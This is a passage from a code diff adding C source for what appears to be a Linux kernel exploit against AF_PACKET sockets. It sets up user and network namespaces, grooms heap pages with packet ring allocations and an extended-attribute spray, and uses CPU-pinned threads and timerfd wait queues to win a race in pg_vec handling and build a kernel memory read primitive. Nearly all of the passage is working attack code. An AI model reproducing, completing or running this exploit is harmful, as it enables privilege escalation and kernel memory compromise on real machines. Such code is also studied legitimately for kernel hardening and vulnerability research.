*linkinfo = mnl_attr_nest_start(nlh, IFLA_LINKINFO); + mnl_attr_put_strz(nlh, IFLA_INFO_KIND, "dummy"); + mnl_attr_nest_end(nlh, linkinfo); + + Mnl_socket_sendto(nl, nlh, nlh->nlmsg_len); + validate_mnl_socket_operation_success(nl, seq); + Mnl_socket_close(nl); +} + +void network_interface_up(int configure_socket_fd, const char *ifname) +{ + struct ifreq ifr = {}; + strncpy(ifr.ifr_name, ifname, IFNAMSIZ - 1); + Ioctl(configure_socket_fd, SIOCGIFFLAGS, (unsigned long)&ifr); + + strncpy(ifr.ifr_name, ifname, IFNAMSIZ - 1); + ifr.ifr_flags |= (IFF_UP | IFF_RUNNING); + Ioctl(configure_socket_fd, SIOCSIFFLAGS, (unsigned long)&ifr); +} + +void network_interface_down(int configure_socket_fd, const char *ifname) +{ + struct ifreq ifr = {}; + strncpy(ifr.ifr_name, ifname, IFNAMSIZ - 1); + Ioctl(configure_socket_fd, SIOCGIFFLAGS, (unsigned long)&ifr); + + strncpy(ifr.ifr_name, ifname, IFNAMSIZ - 1); + ifr.ifr_flags &= (~IFF_UP); + Ioctl(configure_socket_fd, SIOCSIFFLAGS, (unsigned long)&ifr); +} + +void pin_thread_on_cpu(int cpu) +{ + cpu_set_t cpuset; + CPU_ZERO(&cpuset); + CPU_SET(cpu, &cpuset); + + pthread_t current_thread = pthread_self(); + Pthread_setaffinity_np(current_thread, sizeof(cpu_set_t), &cpuset); +} + +void setup_namespace(void) +{ + int uid = getuid(); + int gid = getgid(); + + Unshare(CLONE_NEWUSER | CLONE_NEWNET | CLONE_NEWNS); + + FILE *f = NULL; + f = Fopen("/proc/self/uid_map", "w"); + fprintf(f, "0 %d 1\n", uid); + Fclose(f); + + f = Fopen("/proc/self/setgroups", "w"); + fprintf(f, "deny\n"); + Fclose(f); + + f = Fopen("/proc/self/gid_map", "w"); + fprintf(f, "0 %d 1\n", gid); + Fclose(f); +} + +void setup_tmpfs(void) +{ + Mkdir(TMPFS_MOUNT_POINT, 0755); + Mount("none", TMPFS_MOUNT_POINT, "tmpfs", 0, NULL); + create_file(PAGES_ORDER2_GROOM_SIMPLE_XATTR_FILEPATH); +} + +void setup_nofile_rlimit(void) +{ + struct rlimit nofile_rlimit = {}; + Getrlimit(RLIMIT_NOFILE, &nofile_rlimit); + nofile_rlimit.rlim_cur = nofile_rlimit.rlim_max; + Setrlimit(RLIMIT_NOFILE, 
&nofile_rlimit); +} + +void create_file(const char *path) +{ + int fd = Open(path, O_WRONLY | O_CREAT, 0644); + Close(fd); +} + +bool thread_in_sleep_state(int tid) +{ + if (tid == -1) + return false; + + char proc_path[4096] = {}; + char line_buffer[4096] = {}; + + snprintf(proc_path, sizeof(proc_path), "/proc/%d/stat", tid); + FILE *f = Fopen(proc_path, "r"); + + if (!fgets(line_buffer, sizeof(line_buffer), f)) { + Fclose(f); + return false; + } + + char *p = line_buffer; + int space_count = 0; + while (*p != '\0' && space_count != 2) { + if (*p == ' ') { + space_count++; + } + + p++; + } + + Fclose(f); + + if (*p == 'S' || *p == 'D') { + return true; + } + + return false; +} + +void alloc_pages(int packet_socket, unsigned page_count, unsigned page_size) +{ + struct tpacket_req tx_ring_req = {}; + tx_ring_req.tp_block_nr = page_count; + tx_ring_req.tp_block_size = page_size; + tx_ring_req.tp_frame_size = page_size; + tx_ring_req.tp_frame_nr = tx_ring_req.tp_block_size / tx_ring_req.tp_frame_size * tx_ring_req.tp_block_nr; + Setsockopt(packet_socket, SOL_PACKET, PACKET_TX_RING, &tx_ring_req, sizeof(tx_ring_req)); +} + +void free_pages(int packet_socket) +{ + struct tpacket_req tx_ring_req = {}; + Setsockopt(packet_socket, SOL_PACKET, PACKET_TX_RING, &tx_ring_req, sizeof(tx_ring_req)); +} + +struct victim_packet_socket_config *victim_packet_socket_config_create( + struct __kernel_sock_timeval sndtimeo, + struct sockaddr_ll addr, + struct tpacket_req3 tx_ring, + struct tpacket_req3 rx_ring, + int packet_loss, + int packet_version, + unsigned packet_reserve, + struct sock_filter filter[MAX_FILTER_LEN] +) +{ + struct victim_packet_socket_config *config = Calloc(1, sizeof(*config)); + config->sndtimeo = sndtimeo; + config->addr = addr; + config->tx_ring = tx_ring; + config->rx_ring = rx_ring; + config->packet_loss = packet_loss; + config->packet_version = packet_version; + config->packet_reserve = packet_reserve; + memcpy(config->filter, filter, MAX_FILTER_LEN * 
sizeof(struct sock_filter)); + return config; +} + +void victim_packet_socket_config_destroy(struct victim_packet_socket_config *config) +{ + free(config); +} + +struct victim_packet_socket *victim_packet_socket_create(struct victim_packet_socket_config *config) +{ + struct victim_packet_socket *v = Calloc(1, sizeof(*v)); + v->config = Calloc(1, sizeof(*v->config)); + memcpy(v->config, config, sizeof(struct victim_packet_socket_config)); + v->fd = Socket(AF_PACKET, SOCK_RAW, 0); + return v; +} + +void victim_packet_socket_destroy(struct victim_packet_socket *v) +{ + victim_packet_socket_config_destroy(v->config); + Close(v->fd); + free(v); +} + +void victim_packet_socket_configure(struct victim_packet_socket *v) +{ + struct victim_packet_socket_config *config = v->config; + Bind(v->fd, (const struct sockaddr *)&config->addr, sizeof(config->addr)); + Setsockopt(v->fd, SOL_SOCKET, SO_SNDTIMEO_NEW, &config->sndtimeo, sizeof(config->sndtimeo)); + Setsockopt(v->fd, SOL_PACKET, PACKET_LOSS, &config->packet_loss, sizeof(config->packet_loss)); + Setsockopt(v->fd, SOL_PACKET, PACKET_VERSION, &config->packet_version, sizeof(config->packet_version)); + Setsockopt(v->fd, SOL_PACKET, PACKET_RESERVE, &config->packet_reserve, sizeof(config->packet_reserve)); + Setsockopt(v->fd, SOL_PACKET, PACKET_RX_RING, &config->rx_ring, sizeof(config->rx_ring)); + Setsockopt(v->fd, SOL_PACKET, PACKET_TX_RING, &config->tx_ring, sizeof(config->tx_ring)); + struct sock_fprog fprog = { .filter = config->filter, .len = MAX_FILTER_LEN }; + Setsockopt(v->fd, SOL_SOCKET, SO_ATTACH_FILTER, &fprog, sizeof(fprog)); + + u64 tx_ring_size = (u64)config->tx_ring.tp_block_size * config->tx_ring.tp_block_nr; + u64 rx_ring_size = (u64)config->rx_ring.tp_block_size * config->rx_ring.tp_block_nr; + u64 ring_size = tx_ring_size + rx_ring_size; + void *ring = Mmap(NULL, ring_size, PROT_READ | PROT_WRITE, MAP_SHARED, v->fd, 0); + void *tx_ring = ring + rx_ring_size; + struct tpacket3_hdr *h = tx_ring; + h->tp_len = 
1; + h->tp_status = TP_STATUS_SEND_REQUEST; + Munmap(ring, ring_size); +} + +struct simple_xattr_request *simple_xattr_request_create( + const char *filepath, + const char *name, + const char *value, + size_t value_size +) +{ + struct simple_xattr_request *request = Calloc(1, sizeof(*request)); + strncpy(request->filepath, filepath, PATH_MAX); + strncpy(request->name, name, XATTR_NAME_MAX); + request->value = Calloc(1, value_size); + memcpy(request->value, value, value_size); + request->value_size = value_size; + request->allocated = false; + return request; +} + +void simple_xattr_request_destroy(struct simple_xattr_request *request) +{ + free(request->value); + free(request); +} + +void *timerfd_waitlist_thread_fn(void *arg) +{ + pin_thread_on_cpu(CPU_NUMBER_ONE); + struct timerfd_waitlist_thread *t = arg; + t->tid = gettid(); + + Unshare(CLONE_FILES); + pthread_mutex_lock(&t->mutex); + t->unshare_complete = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); + + Close(STDIN_FILENO); + Close(STDOUT_FILENO); + Close(STDERR_FILENO); + + int epollfd = Epoll_create1(0); + + struct rlimit nofile_rlimit = {}; + Getrlimit(RLIMIT_NOFILE, &nofile_rlimit); + t->timerfds = Calloc(nofile_rlimit.rlim_cur, sizeof(*t->timerfds)); + t->timerfds[0] = t->timerfd; + t->total_timerfd = 1; + + for (int i = 1; i < (int)nofile_rlimit.rlim_cur; i++) { + t->timerfds[i] = dup(t->timerfds[0]); + if (t->timerfds[i] < 0) + break; + + t->total_timerfd++; + } + + t->epoll_events = Calloc(t->total_timerfd, sizeof(*t->epoll_events)); + for (int i = 0; i < t->total_timerfd; i++) { + t->epoll_events[i].data.fd = t->timerfds[i]; + t->epoll_events[i].events = EPOLLIN; + Epoll_ctl(epollfd, EPOLL_CTL_ADD, t->timerfds[i], &t->epoll_events[i]); + } + + for ( ;; ) { + pthread_mutex_lock(&t->mutex); + while (!t->quit && !t->ready_to_work) + pthread_cond_wait(&t->cond, &t->mutex); + + t->ready_to_work = false; + bool quit = t->quit; + pthread_mutex_unlock(&t->mutex); + + if (quit) + 
break; + + pthread_mutex_lock(&t->mutex); + t->work_complete = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); + } + + for (int i = 1; i < t->total_timerfd; i++) + Close(t->timerfds[i]); + + Close(epollfd); + free(t->epoll_events); + free(t->timerfds); + + return NULL; +} + +void timerfd_waitlist_thread_wait_unshare_complete(struct timerfd_waitlist_thread *t) +{ + pthread_mutex_lock(&t->mutex); + while (!t->unshare_complete) + pthread_cond_wait(&t->cond, &t->mutex); + pthread_mutex_unlock(&t->mutex); +} + +void timerfd_waitlist_thread_send_work(struct timerfd_waitlist_thread *t) +{ + pthread_mutex_lock(&t->mutex); + t->ready_to_work = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); +} + +void timerfd_waitlist_thread_wait_in_work(struct timerfd_waitlist_thread *t) +{ + while (t->tid == -1) { + ; + } + + while (!thread_in_sleep_state(t->tid)) { + ; + } +} + +void timerfd_waitlist_thread_wait_work_complete(struct timerfd_waitlist_thread *t) +{ + pthread_mutex_lock(&t->mutex); + while (!t->work_complete) + pthread_cond_wait(&t->cond, &t->mutex); + t->work_complete = false; + pthread_mutex_unlock(&t->mutex); +} + +void timerfd_waitlist_thread_quit(struct timerfd_waitlist_thread *t) +{ + pthread_mutex_lock(&t->mutex); + t->quit = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); + Pthread_join(t->handle, NULL); +} + +struct timerfd_waitlist_thread *timerfd_waitlist_thread_create(int timerfd) +{ + struct timerfd_waitlist_thread *t = Calloc(1, sizeof(*t)); + t->tid = -1; + t->timerfd = timerfd; + pthread_mutex_init(&t->mutex, NULL); + pthread_cond_init(&t->cond, NULL); + Pthread_create(&t->handle, NULL, timerfd_waitlist_thread_fn, t); + return t; +} + +void timerfd_waitlist_thread_destroy(struct timerfd_waitlist_thread *t) +{ + timerfd_waitlist_thread_quit(t); + pthread_cond_destroy(&t->cond); + pthread_mutex_destroy(&t->mutex); + free(t); +} + +struct pg_vec_lock_thread_work 
*pg_vec_lock_thread_work_create(struct victim_packet_socket *v, int ifindex) +{ + struct pg_vec_lock_thread_work *w = Calloc(1, sizeof(*w)); + w->victim_packet_socket = v; + w->ifindex = ifindex; + return w; +} + +void pg_vec_lock_thread_work_destroy(struct pg_vec_lock_thread_work *w) +{ + free(w); +} + +void *pg_vec_lock_thread_fn(void *arg) +{ + pin_thread_on_cpu(CPU_NUMBER_ZERO); + struct pg_vec_lock_thread *t = arg; + t->tid = gettid(); + + Setpriority(PRIO_PROCESS, 0, MAX_NICE); + + for ( ;; ) { + pthread_mutex_lock(&t->mutex); + while (!t->quit && !t->ready_to_work) + pthread_cond_wait(&t->cond, &t->mutex); + + struct pg_vec_lock_thread_work *work = t->work; + t->work = NULL; + t->ready_to_work = false; + bool quit = t->quit; + pthread_mutex_unlock(&t->mutex); + + if (quit) + break; + + struct sockaddr_ll addr = { .sll_ifindex = work->ifindex }; + struct msghdr msg = { .msg_name = &addr, .msg_namelen = sizeof(addr) }; + syscall(SYS_sendmsg, work->victim_packet_socket->fd, &msg, 0); + + pg_vec_lock_thread_work_destroy(work); + pthread_mutex_lock(&t->mutex); + t->work_complete = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); + } + + return NULL; +} + +void pg_vec_lock_thread_send_work(struct pg_vec_lock_thread *t, struct pg_vec_lock_thread_work *w) +{ + pthread_mutex_lock(&t->mutex); + t->work = w; + t->ready_to_work = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); +} + +struct timespec pg_vec_lock_thread_wait_in_work(struct pg_vec_lock_thread *t) +{ + while (!thread_in_sleep_state(t->tid)) { + ; + } + + struct timespec pg_vec_lock_acquire_time = {}; + syscall(SYS_clock_gettime, CLOCK_MONOTONIC, &pg_vec_lock_acquire_time); + return pg_vec_lock_acquire_time; +} + +void pg_vec_lock_thread_wait_work_complete(struct pg_vec_lock_thread *t) +{ + pthread_mutex_lock(&t->mutex); + while (!t->work_complete) + pthread_cond_wait(&t->cond, &t->mutex); + t->work_complete = false; + pthread_mutex_unlock(&t->mutex); +} + 
+void pg_vec_lock_thread_quit(struct pg_vec_lock_thread *t) +{ + pthread_mutex_lock(&t->mutex); + t->quit = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); + Pthread_join(t->handle, NULL); +} + +struct pg_vec_lock_thread *pg_vec_lock_thread_create(void) +{ + struct pg_vec_lock_thread *t = Calloc(1, sizeof(*t)); + pthread_mutex_init(&t->mutex, NULL); + pthread_cond_init(&t->cond, NULL); + t->tid = -1; + t->packet_socket = -1; + t->ifindex = -1; + Pthread_create(&t->handle, NULL, pg_vec_lock_thread_fn, t); + return t; +} + +void pg_vec_lock_thread_destroy(struct pg_vec_lock_thread *t) +{ + pg_vec_lock_thread_quit(t); + free(t); +} + +struct pg_vec_buffer_thread_work *pg_vec_buffer_thread_work_create( + struct victim_packet_socket *v, + bool exploit, + bool cleanup +) +{ + struct pg_vec_buffer_thread_work *w = Calloc(1, sizeof(*w)); + w->victim_packet_socket = v; + w->exploit = exploit; + w->cleanup = cleanup; + return w; +} + +void pg_vec_buffer_thread_work_destroy(struct pg_vec_buffer_thread_work *w) +{ + free(w); +} + +void *pg_vec_buffer_thread_fn(void *arg) +{ + pin_thread_on_cpu(CPU_NUMBER_ZERO); + struct pg_vec_buffer_thread *t = arg; + t->tid = gettid(); + + int reclaim_pg_vec_packet_socket = Socket(AF_PACKET, SOCK_RAW, 0); + + for ( ;; ) { + pthread_mutex_lock(&t->mutex); + while (!t->quit && !t->ready_to_work) + pthread_cond_wait(&t->cond, &t->mutex); + + struct pg_vec_buffer_thread_work *work = t->work; + t->work = NULL; + t->ready_to_work = false; + bool quit = t->quit; + pthread_mutex_unlock(&t->mutex); + + if (quit) + break; + + if (work->exploit) { + struct tpacket_req3 free_pg_vec_req = {}; + syscall( + SYS_setsockopt, + work->victim_packet_socket->fd, + SOL_PACKET, + PACKET_RX_RING, + &free_pg_vec_req, + sizeof(free_pg_vec_req) + ); + + alloc_pages(reclaim_pg_vec_packet_socket, MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_KMALLOC_16, PAGES_ORDER2_SIZE); + } + + if (work->cleanup) { + free_pages(reclaim_pg_vec_packet_socket); + } + + 
pg_vec_buffer_thread_work_destroy(work); + + pthread_mutex_lock(&t->mutex); + t->work_complete = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); + } + + Close(reclaim_pg_vec_packet_socket); + return NULL; +} + +void pg_vec_buffer_thread_send_work(struct pg_vec_buffer_thread *t, struct pg_vec_buffer_thread_work *w) +{ + pthread_mutex_lock(&t->mutex); + t->work = w; + t->ready_to_work = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); +} + +void pg_vec_buffer_thread_wait_in_work(struct pg_vec_buffer_thread *t) +{ + while (t->tid == -1) { + ; + } + + while (!thread_in_sleep_state(t->tid)) { + ; + } +} + +void pg_vec_buffer_thread_wait_work_complete(struct pg_vec_buffer_thread *t) +{ + pthread_mutex_lock(&t->mutex); + while (!t->work_complete) + pthread_cond_wait(&t->cond, &t->mutex); + t->work_complete = false; + pthread_mutex_unlock(&t->mutex); +} + +void pg_vec_buffer_thread_quit(struct pg_vec_buffer_thread *t) +{ + pthread_mutex_lock(&t->mutex); + t->quit = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); + Pthread_join(t->handle, NULL); +} + +struct pg_vec_buffer_thread *pg_vec_buffer_thread_create(void) +{ + struct pg_vec_buffer_thread *t = Calloc(1, sizeof(*t)); + pthread_mutex_init(&t->mutex, NULL); + pthread_cond_init(&t->cond, NULL); + t->tid = -1; + Pthread_create(&t->handle, NULL, pg_vec_buffer_thread_fn, t); + return t; +} + +void pg_vec_buffer_thread_destroy(struct pg_vec_buffer_thread *t) +{ + pg_vec_buffer_thread_quit(t); + pthread_cond_destroy(&t->cond); + pthread_mutex_destroy(&t->mutex); + free(t); +} + +struct tpacket_rcv_thread_work *tpacket_rcv_thread_work_create( + struct timespec pg_vec_lock_release_time, + struct timespec decrease_tpacket_rcv_thread_sleep_time, + struct msghdr *msg +) +{ + struct tpacket_rcv_thread_work *w = Calloc(1, sizeof(*w)); + w->pg_vec_lock_release_time = pg_vec_lock_release_time; + w->decrease_tpacket_rcv_thread_sleep_time = 
decrease_tpacket_rcv_thread_sleep_time; + w->msg = msg; + return w; +} + +void tpacket_rcv_thread_work_destroy(struct tpacket_rcv_thread_work *w) +{ + msghdr_destroy(w->msg); + free(w); +} + +void *tpacket_rcv_thread_fn(void *arg) +{ + pin_thread_on_cpu(CPU_NUMBER_ONE); + struct tpacket_rcv_thread *t = arg; + + int trigger_sendmsg_packet_socket = Socket(AF_PACKET, SOCK_PACKET, 0); + + for ( ;; ) { + pthread_mutex_lock(&t->mutex); + while (!t->quit && !t->ready_to_work) + pthread_cond_wait(&t->cond, &t->mutex); + + struct tpacket_rcv_thread_work *work = t->work; + t->work = NULL; + t->ready_to_work = false; + bool quit = t->quit; + pthread_mutex_unlock(&t->mutex); + + if (quit) + break; + + struct timespec cur_time = {}; + syscall(SYS_clock_gettime, CLOCK_MONOTONIC, &cur_time); + struct timespec remaining_time_before_pg_vec_lock_release = timespec_sub( + work->pg_vec_lock_release_time, + cur_time + ); + + struct timespec sleep_duration = timespec_sub( + remaining_time_before_pg_vec_lock_release, + work->decrease_tpacket_rcv_thread_sleep_time + ); + + syscall(SYS_nanosleep, &sleep_duration, NULL); + syscall(SYS_sendmsg, trigger_sendmsg_packet_socket, work->msg, 0); + tpacket_rcv_thread_work_destroy(work); + + pthread_mutex_lock(&t->mutex); + t->work_complete = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); + } + + return NULL; +} + +void tpacket_rcv_thread_send_work(struct tpacket_rcv_thread *t, struct tpacket_rcv_thread_work *w) +{ + pthread_mutex_lock(&t->mutex); + t->work = w; + t->ready_to_work = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); +} + +void tpacket_rcv_thread_wait_work_complete(struct tpacket_rcv_thread *t) +{ + pthread_mutex_lock(&t->mutex); + while (!t->work_complete) + pthread_cond_wait(&t->cond, &t->mutex); + + t->work_complete = false; + pthread_mutex_unlock(&t->mutex); +} + +void tpacket_rcv_thread_quit(struct tpacket_rcv_thread *t) +{ + pthread_mutex_lock(&t->mutex); + t->quit = true; + 
pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); + Pthread_join(t->handle, NULL); +} + +struct tpacket_rcv_thread *tpacket_rcv_thread_create(void) +{ + struct tpacket_rcv_thread *t = Calloc(1, sizeof(*t)); + pthread_mutex_init(&t->mutex, NULL); + pthread_cond_init(&t->cond, NULL); + Pthread_create(&t->handle, NULL, tpacket_rcv_thread_fn, t); + return t; +} + +void tpacket_rcv_thread_destroy(struct tpacket_rcv_thread *t) +{ + tpacket_rcv_thread_quit(t); + pthread_cond_destroy(&t->cond); + pthread_mutex_destroy(&t->mutex); + free(t); +} + +struct msghdr *msghdr_create( + void *data, + size_t datalen, + const char *devname +) +{ + void *copy_data = Calloc(1, datalen); + if (data) + memcpy(copy_data, data, datalen); + + struct iovec *iov = Calloc(1, sizeof(*iov)); + iov->iov_base = copy_data; + iov->iov_len = datalen; + + struct sockaddr_pkt *addr = Calloc(1, sizeof(*addr)); + snprintf((char *)addr->spkt_device, sizeof(addr->spkt_device), "%s", devname); + struct msghdr *msghdr = Calloc(1, sizeof(*msghdr)); + msghdr->msg_namelen = sizeof(struct sockaddr_pkt); + msghdr->msg_name = addr; + msghdr->msg_iov = iov; + msghdr->msg_iovlen = 1; + return msghdr; +} + +void msghdr_destroy(struct msghdr *msghdr) +{ + struct iovec *iov = msghdr->msg_iov; + size_t iov_len = msghdr->msg_iovlen; + for (size_t i = 0; i < iov_len; i++) + free(iov[i].iov_base); + + free(iov); + struct sockaddr_pkt *addr = msghdr->msg_name; + free(addr); + free(msghdr); +} + +struct necessary_threads *necessary_threads_create(int timerfd) +{ + struct necessary_threads *nt = Calloc(1, sizeof(*nt)); + + nt->timerfd_waitlist_threads = Calloc(TOTAL_TIMERFD_WAITLIST_THREADS, sizeof(*nt->timerfd_waitlist_threads)); + for (int i = 0; i < TOTAL_TIMERFD_WAITLIST_THREADS; i++) + nt->timerfd_waitlist_threads[i] = timerfd_waitlist_thread_create(timerfd); + + for (int i = 0; i < TOTAL_TIMERFD_WAITLIST_THREADS; i++) + timerfd_waitlist_thread_wait_unshare_complete(nt->timerfd_waitlist_threads[i]); + + 
nt->pg_vec_lock_thread = pg_vec_lock_thread_create(); + nt->pg_vec_buffer_thread = pg_vec_buffer_thread_create(); + nt->tpacket_rcv_thread = tpacket_rcv_thread_create(); + + return nt; +} + +void necessary_threads_destroy(struct necessary_threads *nt) +{ + for (int i = 0; i < TOTAL_TIMERFD_WAITLIST_THREADS; i++) + timerfd_waitlist_thread_destroy(nt->timerfd_waitlist_threads[i]); + + pg_vec_lock_thread_destroy(nt->pg_vec_lock_thread); + pg_vec_buffer_thread_destroy(nt->pg_vec_buffer_thread); + tpacket_rcv_thread_destroy(nt->tpacket_rcv_thread); + free(nt); +} + +void pages_order2_read_primitive_init(struct pages_order2_read_primitive *primitive) +{ + primitive->drain_pages_order2_packet_socket = Socket(AF_PACKET, SOCK_RAW, 0); + primitive->drain_pages_order3_packet_socket_1 = Socket(AF_PACKET, SOCK_RAW, 0); + primitive->drain_pages_order3_packet_socket_2 = Socket(AF_PACKET, SOCK_RAW, 0); + + struct tpacket_req3 tx_ring = {}; + tx_ring.tp_block_size = PAGES_ORDER1_SIZE; + tx_ring.tp_block_nr = 1; + tx_ring.tp_frame_size = PAGES_ORDER1_SIZE; + tx_ring.tp_frame_nr = tx_ring.tp_block_size / tx_ring.tp_frame_size * tx_ring.tp_block_nr; + + struct tpacket_req3 rx_ring = {}; + rx_ring.tp_block_size = PAGES_ORDER3_SIZE; + rx_ring.tp_block_nr = MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_KMALLOC_16; + rx_ring.tp_frame_size = PAGES_ORDER3_SIZE; + rx_ring.tp_frame_nr = rx_ring.tp_block_size / rx_ring.tp_frame_size * rx_ring.tp_block_nr; + rx_ring.tp_sizeof_priv = 16248; + rx_ring.tp_retire_blk_tov = USHRT_MAX; + + struct sock_filter filter[MAX_FILTER_LEN] = {}; + for (int i = 0; i < MAX_FILTER_LEN - 1; i++) { + filter[i].code = BPF_LD | BPF_IMM; + filter[i].k = 0xcafebabe; + } + + filter[MAX_FILTER_LEN - 1].code = BPF_RET | BPF_K; + filter[MAX_FILTER_LEN - 1].k = sizeof(size_t); + + primitive->victim_packet_socket_config = victim_packet_socket_config_create( + (struct __kernel_sock_timeval){ .tv_sec = 1 }, // sndtimeo + (struct sockaddr_ll){ .sll_family = AF_PACKET, .sll_ifindex = 
If_nametoindex(DUMMY_INTERFACE_NAME), .sll_protocol = htons(ETH_P_ALL) }, // addr + tx_ring, // tx_ring + rx_ring, // rx_ring + 1, // packet_loss + TPACKET_V3, // packet_version + 38, // packet_reserve + filter // filter + ); + + struct simple_xattr_request *simple_xattr_request = NULL; + + for (int i = 0; i < TOTAL_PAGES_ORDER2_SIMPLE_XATTR_SPRAY; i++) { + char value[XATTR_SIZE_MAX] = {}; + char name[XATTR_NAME_MAX + 1] = {}; + snprintf(name, sizeof(name), PAGES_ORDER2_GROOM_SIMPLE_XATTR_NAME_FMT, i); + snprintf(value, sizeof(value), PAGES_ORDER2_GROOM_SIMPLE_XATTR_VALUE_FMT, i); + simple_xattr_request = simple_xattr_request_create( + PAGES_ORDER2_GROOM_SIMPLE_XATTR_FILEPATH, + name, + value, + KMALLOC_8K_SIZE + ); + + primitive->simple_xattr_requests[i] = simple_xattr_request; + } +} + +void pages_order2_read_primitive_cleanup(struct pages_order2_read_primitive *primitive) +{ + if (primitive->victim_packet_socket_config) { + victim_packet_socket_config_destroy(primitive->victim_packet_socket_config); + primitive->victim_packet_socket_config = NULL; + } + + if (primitive->drain_pages_order2_packet_socket != -1) { + Close(primitive->drain_pages_order2_packet_socket); + primitive->drain_pages_order2_packet_socket = -1; + } + + if (primitive->drain_pages_order3_packet_socket_1 != -1) { + Close(primitive->drain_pages_order3_packet_socket_1); + primitive->drain_pages_order3_packet_socket_1 = -1; + } + + if (primitive->drain_pages_order3_packet_socket_2 != -1) { + Close(primitive->drain_pages_order3_packet_socket_2); + primitive->drain_pages_order3_packet_socket_2 = -1; + } + + for (int i = 0; i < TOTAL_PAGES_ORDER2_SIMPLE_XATTR_SPRAY; i++) { + if (primitive->simple_xattr_requests[i] && primitive->simple_xattr_requests[i]->allocated) { + Removexattr( + primitive->simple_xattr_requests[i]->filepath, + primitive->simple_xattr_requests[i]->name + ); + + primitive->simple_xattr_requests[i]->allocated = false; + } + if (primitive->simple_xattr_requests[i]) + simple_xattr_request_destroy(primitive->simple_xattr_requests[i]); + 
primitive->simple_xattr_requests[i] = NULL; + } + + if (primitive->overflowed_simple_xattr_request) { + if (primitive->overflowed_simple_xattr_request->allocated) { + Removexattr( + primitive->overflowed_simple_xattr_request->filepath, + primitive->overflowed_simple_xattr_request->name + ); + + simple_xattr_request_destroy(primitive->overflowed_simple_xattr_request); + primitive->overflowed_simple_xattr_request = NULL; + } + } + + if (primitive->leaked_content_simple_xattr_request) { + if (primitive->leaked_content_simple_xattr_request->allocated) { + Removexattr( + primitive->leaked_content_simple_xattr_request->filepath, + primitive->leaked_content_simple_xattr_request->name + ); + + simple_xattr_request_destroy(primitive->leaked_content_simple_xattr_request); + primitive->leaked_content_simple_xattr_request = NULL; + } + } +} + +void pages_order2_read_primitive_page_drain(struct pages_order2_read_primitive *primitive) +{ + alloc_pages(primitive->drain_pages_order2_packet_socket, 1024, PAGES_ORDER2_SIZE); + alloc_pages(primitive->drain_pages_order3_packet_socket_1, 1024, PAGES_ORDER3_SIZE); + alloc_pages(primitive->drain_pages_order3_packet_socket_2, 512, PAGES_ORDER3_SIZE); +} + +void pages_order2_read_primitive_page_drain_cleanup(struct pages_order2_read_primitive *primitive) +{ + free_pages(primitive->drain_pages_order2_packet_socket); + free_pages(primitive->drain_pages_order3_packet_socket_2); +} + +void pages_order2_read_primitive_setup_simple_xattr(struct pages_order2_read_primitive *primitive) +{ + free_pages(primitive->drain_pages_order3_packet_socket_1); + + for (int i = 0; i < ARRAY_SIZE(primitive->simple_xattr_requests); i++) { + Setxattr( + primitive->simple_xattr_requests[i]->filepath, + primitive->simple_xattr_requests[i]->name, + primitive->simple_xattr_requests[i]->value, + primitive->simple_xattr_requests[i]->value_size, + XATTR_CREATE + ); + + primitive->simple_xattr_requests[i]->allocated = true; + } + + for (int i = 512; i < 
ARRAY_SIZE(primitive->simple_xattr_requests); i += 128) { + Removexattr( + primitive->simple_xattr_requests[i]->filepath, + primitive->simple_xattr_requests[i]->name + ); + + primitive->simple_xattr_requests[i]->allocated = false; + } +} + +void pages_order2_read_primitive_cleanup_simple_xattr(struct pages_order2_read_primitive *primitive) +{ + for (int i = 0; i < ARRAY_SIZE(primitive->simple_xattr_requests); i++) { + if (primitive->simple_xattr_requests[i] && primitive->simple_xattr_requests[i]->allocated) { + Removexattr( + primitive->simple_xattr_requests[i]->filepath, + primitive->simple_xattr_requests[i]->name + ); + + primitive->simple_xattr_requests[i]->allocated = false; + } + } +} + +void pages_order2_read_primitive_main_work( + struct pages_order2_read_primitive *primitive, + struct necessary_threads *necessary_threads, + int timerfd, + int configure_network_interface_socket, + struct timespec timer_interrupt_amplitude, + struct timespec decrease_tpacket_rcv_thread_sleep_time +) +{ + u8 packet_data[128] = {}; + int dummy_ifindex = If_nametoindex(DUMMY_INTERFACE_NAME); + *(size_t *)(packet_data) = XATTR_SIZE_MAX; + + struct pg_vec_lock_thread_work *pg_vec_lock_thread_work = NULL; + struct pg_vec_buffer_thread_work *pg_vec_buffer_thread_work = NULL; + struct tpacket_rcv_thread_work *tpacket_rcv_thread_work = NULL; + struct tpacket_rcv_thread_work_result *tpacket_rcv_thread_work_result = NULL; + struct msghdr *msghdr = NULL; + + struct victim_packet_socket_config *victim_packet_socket_config = primitive->victim_packet_socket_config; + struct timespec pg_vec_lock_timeout = { + .tv_sec = victim_packet_socket_config->sndtimeo.tv_sec, + .tv_nsec = victim_packet_socket_config->sndtimeo.tv_usec * NSEC_PER_USEC + }; + + pin_thread_on_cpu(CPU_NUMBER_ZERO); + struct victim_packet_socket *victim_packet_socket = victim_packet_socket_create(victim_packet_socket_config); + pg_vec_lock_thread_work = pg_vec_lock_thread_work_create(victim_packet_socket, dummy_ifindex); + 
